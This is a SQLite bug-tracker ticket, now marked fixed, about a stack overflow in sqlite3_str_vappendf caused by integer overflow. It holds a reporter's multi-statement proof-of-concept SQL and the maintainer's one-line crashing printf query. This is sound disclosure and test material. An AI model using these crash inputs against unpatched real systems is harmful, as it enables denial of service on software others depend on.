SQLite

View Ticket
Login
Ticket Hash: 23439ea5822411389c8edac234c08f2cc27ef3e9
Title: Stack overflow in sqlite3_str_vappendf, caused by int overflow
Status: Fixed Type: Code_Defect
Severity: Important Priority: Low
Subsystem: Utilities Resolution: Fixed
Last Modified: 2020-05-23 20:03:59
Version Found In:
User Comments:
yongheng added on 2020-05-23 17:52:02:
Affected latest release version. 

POC:
---
CREATE TABLE a(b DOUBLE CHECK( NOT CASE WHEN printf(b, b) THEN 0 END) UNIQUE ON CONFLICT REPLACE);
CREATE TRIGGER c INSERT ON a BEGIN INSERT INTO a SELECT group_concat(b, 2147483647) FROM a;END;
INSERT INTO a(b, b, b) VALUES(NULL, 9, 3);
UPDATE a SET b = 0;
INSERT INTO a VALUES('GERMANY''s%'), ('Y'), ('Brand#23')
---

drh added on 2020-05-23 20:03:59: (text/x-fossil-wiki)
Simplified test case:

<blockquote><verbatim>
SELECT printf('%.*g',2147483647,0.01);
</verbatim></blockquote>

Affects all versions of SQLite since printf() was introduced in
version 3.8.3 (2014-02-03).